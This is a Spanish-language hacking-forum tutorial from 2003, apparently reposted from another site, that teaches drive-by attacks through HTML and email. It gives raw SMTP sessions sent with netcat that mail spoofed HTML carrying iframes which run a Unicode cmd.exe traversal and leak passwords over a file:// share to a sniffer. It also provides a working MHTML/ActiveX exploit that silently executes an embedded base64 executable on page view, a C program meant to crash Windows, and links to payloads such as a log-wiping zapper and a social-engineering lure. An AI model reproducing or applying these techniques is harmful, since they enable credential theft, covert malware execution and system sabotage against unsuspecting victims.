En fin, con esto terminar mi aventura con HTML....

Muy importante ser que hayis comprendido el contenido de los post anteriores sobre HTML, especialmente el de La importancia de llamarse HTML.... ste es el link para los que no lo vieron: http://www.hackxcrack.com/phpBB2/viewtopic.php?t=5634 En esta ocasin vamos a realizar dos prcticas con varios ejemplos cada una: 1) Enviar por mail las webs maliciosas vistas en los post anteriores, concretamente las del robo de contraseas y UNICODE 2) Crearemos un archivo HTML con un .exe incrustado MIME que ejecutar LO QUE NOS DE LA GANA, con tan slo visitar la web. Todo ello de forma trnsparente al desconfiado visitante, con sigilo, si necesidad de que intervenga, por el mero hecho de abrir un inofensivo archivo HTML CORREO 1 Nos crearemos un archivo de texto con el siguiente contenido:
Cdigo: helo localhost mail from: origen@queATACO.com rcpt to: destino@pobreMiguelito.com data Subject: Probando, probando, 1-2, 1-2 Mime-Version: 1.0 Content-Type: text/html; <BODY BGCOLOR="black" TEXT="yellow" SCROLL=yes> <img src="img/thor.jpg"> <b>HOLA CHIC@S ESTAIS PREPARADOS...</b> <br><br> <iframe src=http://www.terra.es height=200 width=300 scrolling=no> </iframe> <iframe src=http://80.36.230.235/scripts/cmd.exe?/c+dir+c:\ height=200 width=300></iframe> <BR><BR> En el Frame de la izquierda vers la web de terra a tamao 200 x 300 sin barras de desplazamiento <br> En el Frame de la derecha estars viendo el directorio c:\ del server de pruebas de HxC </BODY> . quit

Descargado de www.DragonJAR.us / Google => "La WeB de DragoN"

Si comprobis el cdigo con los otros posteados anteriormente veris que es idntico, lo nico que se incluye nuevo son las cabeceras del mail y las lneas Mime-Version y Content-Type. Destacar que no ha sido preciso las marcas de inicio y final del cdigo <HTML> y </HTML> puesto que eso mismo ya se lo indicamos en la etiqueta Content-Type: text/html; Como es obvio, debis cambiar las direcciones de MAIL FROM y de RCPT TO, por las que correspondan, para probar ya lo sabis, las vuestras... luego las de otros.... La imagen de mi avatar, no saldr puesto que no se ha incrustado en el mail, por razones de espacio, tan slo existe la referencia, no la imagen en s misma, por ello en sta y otras prcticas os saldr el cuadradito de la imagen, pero sin su contenido grfico. Cmo se enva esto Pues una vez guardado en un .txt, por ejemplo AprendiendoCorreo.txt, y lo guardamos en el mismo directorio dnde tengamos el netcat, hay que ver lo que da de s el nc, entonces escribimos: Type AprendiendoCorreo.txt|nc -vv -w 3 servidor_de_correo 25 Y se enva.... Cuando el destinatario lo reciba, si lo abre con Outlook, se comportar como si se tratase de una web, es decir, se ejecutarn los famosos iframe... CORREO 2
Cdigo:

Descargado de www.DragonJAR.us / Google => "La WeB de DragoN"

echo localhost mail from: origen@queATACO.com rcpt to: destino@pobreMiguelito.com data Subject: Probando, probando, 1-2, 1-2 Mime-Version: 1.0 Content-Type: text/html; <HEAD></HEAD> <BODY BGCOLOR="black" TEXT="yellow" SCROLL=yes> <img src="img/thor.jpg"> <b>HOLA CHIC@S ESTAIS PREPARADOS...</b> <br><br> <iframe src=http://www.terra.es height=300 width=600 scrolling=yes> </iframe> <iframe src=file://172.28.130.254/kekosas/nul.gif height=1 width=1 scrolling=no> </iframe> </BODY> . quit

ste lo tratis de igual modo que el anterior, lo metis en un .txt p.e. (RobandoCorreo.txt), se cambian los remitentes y destinatarios, y se enva con el netcat como antes, cuando lo reciba con Outlook, si tenemos el esnifer preparado, podremos robarle la contrasea como ya se ha explicado. Quizs llame la atencin el parmetro -w 3, que se puso en el netcat, esto desconectar a nuestro nc pasados 3 segundos, lo ponemos as para que d por finalizado el envo y de algo de tiempo al servidor de correo para tragarse el mail.

EXE's incrustados y LISTOS para ejecutarse

Hay muchas formas de hacerlo, yo voy a exponer una de ellas, el objetivo es disponer de un fichero html que slo por visualizarlo ejecute el archivo que queramos. El archivo no tiene por qu existir en la vctima, de hecho si existiera sera mucho ms fcil... He elegido un archivo inofensivo para el ejercicio, se trata de un visualizador-editor de cookies, que por otra parte a ms de uno le vendr bien. Cuando ejecutis el archivo vlocal.html, arrancar la pgina de google y EJECUTARA el archivo de las cookies, podra haber sido otra cosa, un Descargado de www.DragonJAR.us / Google => "La WeB de DragoN"

troyanito, un bouncer, un virus, un keylogger, un exploit o un DoS. Al final de ste doc, tendris un link de descarga con varios ejemplos, he puesto uno con el que podris reiniciar cualquier windows, jeje y slo por visitar nuestra web, le apagamos-reiniciamos el equipo a un pollo. AVISO, no quiero que nadie piense mal, bah... apagar un PC eso es de lammers.... Si la causa es justa no viene mal tenerlo a mano, por ejemplo, situaciones en las que procede (una comprometida y otra de aviso) 1.- Despus de la instalacin de un troyano o similar que precise reiniciar windows 2.- Imaginad que descubris a un extra-mega-super h4cx0r-divino-de-lamuerte que est accediendo a vuestro web server, probando unicodes, exploits, etc... pues con ste programita incluido en un html podemos incitarle y dirigir su sesin de navegacin hacia el html malicioso y cuando el to llega a la pgina, ZAS!! Su pc se apaga.... Bueno, a lo que vamos, lo primero el cdigo del archivo html, luego la explicacin
Cdigo:

Descargado de www.DragonJAR.us / Google => "La WeB de DragoN"

MIME-Version: 1.0 Content-Location:file:///vic_thor.exe Content-Transfer-Encoding: base64 TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA8AAAAA4fug4AtAnNIbgBTM0hVG ......................... ......................... AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA== <title>Vic_Thor</title> <body bgcolor=black scroll=no> <SCRIPT> function malicialocal() { var s=document.URL var path=unescape(s.substr(-0,s.lastIndexOf("\\"))); var formato= '<body scroll=no bgcolor="black"><FONT face="Arial" color=orange>'; var imagen= '<img src="img/thor.jpg">'; var texto = '<b> PREPARADOS? Os presento el mejor buscador que EXISTE!!!</b><br>'; var iframe1='<iframe src=http://www.google.com height=300 width=750></iframe>'; var iframe2='<iframe src=file://172.28.130.254/kekosas/nul.gif height=1 width=1></iframe>'; var objetoini='<object classid="clsid:66666666-6666-6666-6666" CODEBASE="mhtml:'; var objetofin='\\Vlocal.html!file:///vic_thor.exe"></object>'; var bugg = objetoini+path+objetofin document.write (formato+imagen+texto+iframe1+iframe2+bugg); } setTimeout("malicialocal()",200); </script>

El cdigo de arriba, combina el robo de contraseas con la ejecucin de un programa de nuestra eleccin. REPITO, no debis preocuparos por la autoejecucin del cdigo, es inofensivo, es ms, os vendr hasta bien para conocer vuestras cookies, y lo dicho... podra haber sido algo malo. He asignado el cdigo en variables, de sta forma podris usarlo en otras funciones-scripts, etc. Con muy pocos cambios, ahora vamos a explicar todo este rollo.
Cdigo: MIME-Version: 1.0 Content-Location:file:///vic_thor.exe Content-Transfer-Encoding: base64

Incrusta el exe dentro del html, convertido al formato Base64 (recordad Descargado de www.DragonJAR.us / Google => "La WeB de DragoN"

el post de los decoders). Las dos lneas bajo MIME, indican cmo se llamar el archivo codificado (vic_thor.exe) y el formato (base64) A continuacin tenemos un chorizo laaaargiiiiiisiiiiimoooooo de signos, eso es el archivo .exe codificado en Base64, por motivos que entenderis, slo he puesto un extracto.
Cdigo: <title>Vic_Thor</title> <body bgcolor=black scroll=no>

Aqu termina el archivo codificado, damos un ttulo al documento y elegimos un color negro y sin barras de desplazamiento. Lo del negro tiene su explicacin.... si no lo ponemos, el chorizo de Base64 se ver cuando se ejecute y eso no es bueno, la tcnica ms sencilla para que no se vea consiste en poner el mismo color de fondo que de texto, como la fuente va en negro, pues no se ver. (texto en negro y fondo negro), en otros ejemplos lo encerr entre <!-- y -->, tambin funciona, ya os daris cuenta cuando lo ejecutis
Cdigo: <SCRIPT> function malicialocal() {

Bueno, esto tambin es sencillo, se inidca que vamos a usar un script y declaramos una funcin llamada maliciosalocal que no acepta argumentos o parmetros, ni devuelve resultados, parntesis vacos () A partir de aqu, se definen e inicializan una serie de variables de cadena o de string o alfanumricas o como las queris llamar, las ir explicando:
Cdigo: var s=document.URL var path=unescape(s.substr(-0,s.lastIndexOf("\\")));

La variable s guardar la direccin web del archivo .html, p.e.: D:\malicia\vlocal.html o la ruta completa dnde resida el archivo. La variable path se queda nicamente con la ruta, siguiendo con el ejemplo sera D:\malicia, la funcin substr extrae de la variable s

Descargado dede www.DragonJAR.us / Google => "La WeB de DragoN" Descargado www.DragonJAR.us / .com / "La WeB de DragoN"

todos los caracteres desde el primero de la izquierda hasta la ltima barra (\), A la funcin lastIndexOf se le ponen dos barras porque en JS, HTML, etc. No se puede representar el signo \ por s slo, vamos que si queremos poner una barra (\), para que el navegador lo entienda se deben poner dos \\ y no solo una, se trata de un problema sintctico, no porque existan realmente dos barras en la direccin web que guarda la variable s.
Cdigo: var formato= '<body scroll=no bgcolor="black"><FONT face="Arial" color=orange>'; var imagen= '<img src="img/thor.jpg">'; var texto = '<b> PREPARADOS? Os presento el mejor buscador que EXISTE!!!</b><br>'; var iframe1='<iframe src=http://www.google.com height=300 width=750></iframe>'; var iframe2='<iframe src=file://172.28.130.254/kekosas/nul.gif height=1 width=1></iframe>';

Todas stas variables guardan el contenido que el visitante ver, observad que es muy parecido al cdigo HTML de los ejemplos de correo anteriores, slo que metido en variables para luego utilizarlas. Formato es la variable que guarda el aspecto de la pgina, color de fondo, tipo y color del texto Imagen la variable que contiene el link o lugar donde est guardad la imagen. Texto es la variable que contiene el texto que se visualizar al cargar la pgina Iframe1 e iframe2 son las variables que definen los marcos a usar, uno con la pgina de google y otro con el acceso a un fichero que no existe para robar la contrasea si tenemos el esnifer preparado en esa direccin, todo esto ya se explic en los post anteriores de HTML Destacar tambin el uso de comillas simples (') para agrupar las expresiones que a su vez utilizan comillas dobles (") , de ste modo no se producen errores y el navegador interpreta correctamente el principio y el final de la serie de caracteres.
Cdigo: var objetoini='<object classid="clsid:66666666-6666-6666-6666" CODEBASE="mhtml:'; var objetofin='\\Vlocal.html!file:///vic_thor.exe"></object>'; var bugg = objetoini+path+objetofin

Descargado de www.DragonJAR.us / Google => "La WeB de DragoN"

Bueno, bueno. Esto es el bug en s mismo, si lo hubisemos escrito todo seguido sera:
<object classid="clsid:66666666-6666-6666-6666" CODEBASE="mhtml:'+path+'\\Vlocal.html!file:///vic_thor.exe"></object>

Para decirlo de un modo sencillo, utiliza un control ActiveX y lo asocia a nuestro fichero codificado en Base64 como formato mhtml (MimeHTML), si traducimos por el contenido de las variables, sera algo as mhtml:D:\\malicia\\Vlocal.html!file:///vic_thor.exe Vuelvo a insistir en el uso de barras repetidas, dos barras equivalen a una, tres barras equivalen a dos, etc., de forma que si hubisemos escrito eso mismo directamente en la barra de direccin, sera: mhtml:D:\malicia\Vlocal.html!file://vic_thor.exe El resultado de nuestro navegador es que cuando llegue el momento de visualizar el html, adems de la web se ejecutar el fichero vic_thor.exe incrustado en formato mime dentro del archivo html situado en d:\malicia\vlocal.html. El archivo vic_thor.exe, realmente es [color=limeiecv.exe [/color]que permite ver las cookies almacenadas en nuestro pc, es como si lo hubisemos renombrado.... Por ltimo tenemos:
Cdigo: document.write (formato+imagen+texto+iframe1+iframe2+bugg); } setTimeout("malicialocal()",200); </script>

document.write escribir en el documento el contenido de las variables que se indican entre parntesis, esas variables contienen el aspecto y contenidos como ya se explic anteriormente. La llave cerrada (}) marca el final de la funcin malicialocal() declarada al principio. SetTiemout, llama a la funcin malicialocal() pasados 200 milisegundos, este intervalo se puede variar, si ponemos 5000, pues aproximadamente tardar 5 segundos en mostrar la pgina, etc. Es recomendable poner un tiempo de espera para que el navegador Descargado de www.DragonJAR.us / Google => "La WeB de DragoN"

cargue el script del todo, por eso 200 milisegundos, valores a partir de ese nmero funcionarn tambin sin problemas. Todos los nombres son ficticios, no tienen porqu ser esos, al igual que los directorios, lo nico que no debis hacer es cambiar de nombre al archivo vlocal.html porque sino no os funcionar, bueno s lo har si adems del nombre fsico del archivo se lo cambiis al contenido de la variable, cuando empecis a trastear con ello lo entenderis mejor. Cmo podemos manipular el script para que funcione con otros ficheros y/o pginas: 1) Se debe convertir el .exe que deseamos ejecutar a Base64 y pegar su contenido en lugar del que hay. 2) podemos mantener como nombre vic_thor.exe, si quisiramos cambiarlo, por ejemplo a prog.exe, debemos cambiar stas lneas:
Cdigo: Content-Location:file:///vic_thor.exe por: Content-Location:file:///prog.exe

Y tambin debemos cambiar:

Cdigo: var objetofin='\\Vlocal.html!file:///vic_thor.exe"></object> por sta otra

var objetofin='\\Vlocal.html!file:///prog.exe"></object>';

3) Podemos cambiar el nombre del archivo vlocal.html por otro diferente, por ejemplo por index.html , para ello se deben cambiar stas lnea:
Cdigo: var objetofin='\\Vlocal.html!file:///vic_thor.exe"></object>'; por sta otra: var objetofin='\\index.html!file:///vic_thor.exe"></object>'

Os recuerdo que si modificamos el nombre del .exe tambin ser necesario cambiar en sta misma lnea vic_thor.exe por el nombre Descargado de www.DragonJAR.us / Google => "La WeB de DragoN"

nuevo como se explic en el punto 2. Como vis es bastante til disponer del contenido en variables, de ese modo otros programas o scripts las pueden variar a nuestro antojo e incluir sta funcin (malicialocal()) a modo de librera que esos otros programas llamen y la ejecuten. La versin del cdigo que he tratado, slo ser efectiva si el archivo html se ejecuta desde el equipo local, no lo podis colocar directamente en un web server para que se lance de forma remota, para hacer esto ltimo hay que modificar un poquito el contenido y tener suerte, adems muchos servidores gratuitos utilizan frames y otros cdigos que nos lo fastidiarn, pero eso no impide montarnos nuestro propio servidor web y colocarlo all. Al final del documento tenis una versin modificada para colgar directamente en la Web, el problema ser que los navegadores actuales suelen tener desactivado la ejecucin de secuencias de cdigo ActiveX y no funcionar del todo, digo del todo porque para la prxima intentaremos cuanto menos, que se guarde el archivo localmente aunque no se pueda ejecutar, de forma que si coneguimos robarle la contrasea como ya se ha explicado hasta la saciedad, podremos conectarnos al equipo remoto y ejecutarle el archivito. EXPLOIT para matar a windows, Para finalizar, si una vez ejecutado el cdigo malicioso es preceptivo un reinicio para que los cambios tomen efecto, vamos a crear un exploit que lo hace, es sumamente simple y el su descubrimiento fue casual por mi parte, probando otras cositas lo descubr, aunque al final, como siempre pasa, existen otros mentes calenturientas que llegaron a la misma conclusin. Para ello vamos a necesitar un compilador de C y el cdigo lgico. El programa en C, sera ste:
Cdigo: #include <stdio.h> int main(void) { while (1) printf("\t\t\b\b\b\b\b\b"); return 0; }

S, as de sencillito.... esto provocar un desbordamiento de buffer del servicio CSRSS.exe que bloquear windows y lo reiniciar Descargado de www.DragonJAR.us / Google => "La WeB de DragoN"

Es un bucle infinito que enva a pantalla tabulaciones y retrocesos consecutivos, cuando son excesivos, Windows se bloquea y reinicia. Lo compilais con Dev++ o con Vc++ y a funcionar, cuando se ejecuta Windows se paraliza y se muere. Para meterlo dentro de nuestro .html malicioso, bastara con transformarlo a Base64 y pegarlo en lugar de los que hay, cuando visualicis el archivo vlocal.html o como se llame, windows se reinicia... Todos los cdigos fuentes y ejemplos los tenis aqu: Prcticas de envo de correo http://www.iespana.es/FTPVicThor/malaweb/CorreoFuentes.zip Ejecucin MIME del archivo vercookies http://www.iespana.es/FTPVicThor/malaweb/VerCookies.zip Ejecucin MIME del borrado de logs Esta versin la podis colocar directamente en un servidor web y funcionar remotamente, con alguna restriccin que responder a ellas en el Foro a medida que se os vayan produciendo http://www.iespana.es/FTPVicThor/malaweb/LogsForWeb.zip Ejecucin MIME para reiniciar Windows OJO QUE CUANDO LO EJECUTEIS WINDOWS SE MUEREEEEE. http://www.iespana.es/FTPVicThor/malaweb/AdiosWin.zip Ejecucin MIME con algo de Ingeniera Social, En ste ejemplo, un incauto visitante de la web se descarga un manual que le interesa o se lo hemos enviado por mail, se trata de un manual del netcat, cuando lo visualiza en su equipo para imprimirlo o leerlo, se le ejecutar tambin el cdigo malicioso. NO PREOCUPAROS, lo que se os va a ejecutar cuando lo hagis ser un escaneador de servidores vulnerables a REDCODE, vamos que no es nada raro, ni os estoy colocando un virus ni otras cosas que hubiese podido, eso s, slo hay unos 10 segundos para leerlo.... vaaale, dejar que lo podis ver y no modificar el script para que lo elimine, seguro que a ms de uno le viene bien el manual de netcat. Descargado de www.DragonJAR.us / Google => "La WeB de DragoN"

http://www.iespana.es/FTPVicThor/malaweb/manualNC.zip Cdigos ejecutables (.exe) Del zapper que borra logs, vercookies, tirar a windows , el decoder para convertir .exe a Base64 y el escaneador de REDCODE http://www.iespana.es/FTPVicThor/malaweb/ArchivosEXE.zip Bueno hay ms formas, existe otras ejecuciones CODEBASE, el bug del wav-exe, y muchas otras que permiten inyectar archivos .exe en archivos .html que se ejecutan al visualizarlos, recibirlos por correo o simplemente por situar el cursor sobre ellos. Que aproveche y SALUD a todos. PD. No s si lo veris interesante, pero pienso que la prxima debera ser el aprender cmo defendernos de todo esto, configurar bien el equipo, detectar mails maliciosos, evitar la ejecucin de cdigo, etc. Qu os parece? --- AMPLIADO HOY JUEVES 22 DE MAYO DE 2003 ---Antes de que ocurriese la prdida inesperada de ste y otros post en el da de ayer, creo recordar que alguno de vosotros no le funcionaba del todo. Microsoft sac un parche (que no he probado) para evitar ste asunto el 23 de abril de 2003, antes de esa fecha ste cdigo ya circulaba entre alguno de nosotros y funcionaba OK segn los privados que me enviaron, los que hayis actualizado los hotfix recientemente es probable que no os funcionen, el caso es que con hotfix o sin ellos PROBADLO EN LOCAL, para colgarlo de un webserver hay que tocar algunas cosas, en el ejemplo de VicForWeb est el cdigo modificado para la web, pero no siempre funcionar, depender mucho del Website y de la configuracin del navegador del "visitante" parche: http://www.microsoft.com/technet/treeview/?url=/technet/security/bull etin/MS03-014.asp _________________ -<|:

Descargado de www.DragonJAR.us / Google => "La WeB de DragoN"